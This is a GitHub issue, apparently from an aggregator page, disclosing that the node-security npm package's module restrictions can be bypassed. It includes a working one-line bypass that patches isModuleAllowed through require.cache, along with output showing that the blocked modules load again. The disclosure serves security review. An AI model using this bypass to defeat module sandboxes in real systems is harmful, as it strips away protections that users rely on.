Security checks can be completely bypassed by a malicious script
First off, I started looking at this repository because it’s gaining traction. I’m also posting this here since there are no listed dependents on npm (yet).
I want to put forward my belief that you cannot secure a JavaScript context using JavaScript alone. This is why packages like vm2 exist (which wraps node’s vm module). This is also why node-security is inherently insecure unless you introduce a native component that modifies the behavior of the execution context. This is an extremely hard problem to solve.
Please do not use this package if you need a secure execution context.
The following code can bypass your module’s security checks entirely. Note that this took me roughly 5 minutes to reverse engineer. Any attempts to obscure this will fail.
/* secure.js */
const nodesecurity = require( '@matthaywardwebdesign/node-security' );
const NodeSecurity = new nodesecurity();
// Don't allow anything at all.
NodeSecurity.configure({});

/* index.js */
function try_require(name) {
  try {
    require(name);
    console.log(name, '\x1b[1;32mOK\x1b[m');
  } catch (e) {
    console.error(name, '\x1b[1;31mFAIL\x1b[m -', e.message);
  }
}
try_require('http');
try_require('fs');
try_require('net');

/* bypass.js */
require.cache[Object.keys(require.cache).filter(s => /node-security\/dist\/ModuleLoader\.js$/.test(s))[0]].exports.default.prototype.isModuleAllowed = () => true;

$ node ./index.js
http OK
fs OK
net OK

$ node -r ./secure.js ./index.js
http FAIL - NodeSecurity has blocked an attempt to access module 'http'. Parent modules = ['/private/tmp/test-node-security/index.js']
fs FAIL - NodeSecurity has blocked an attempt to access module 'fs'. Parent modules = ['/private/tmp/test-node-security/index.js']
net FAIL - NodeSecurity has blocked an attempt to access module 'net'. Parent modules = ['/private/tmp/test-node-security/index.js']

$ node -r ./secure.js -r ./bypass.js ./index.js
http OK
fs OK
net OK
Issue Analytics
- Created 5 years ago
- Reactions: 10
- Comments: 12 (4 by maintainers)
Top GitHub Comments
@matthaywardwebdesign I look forward to reviewing the next iteration. 😃
@Qix, the hero we need… 😃
But also, I saw this repo from suggested pages in Chrome, and as I was looking through the code, I had the exact same concern. Glad to see my hunch was right. 👍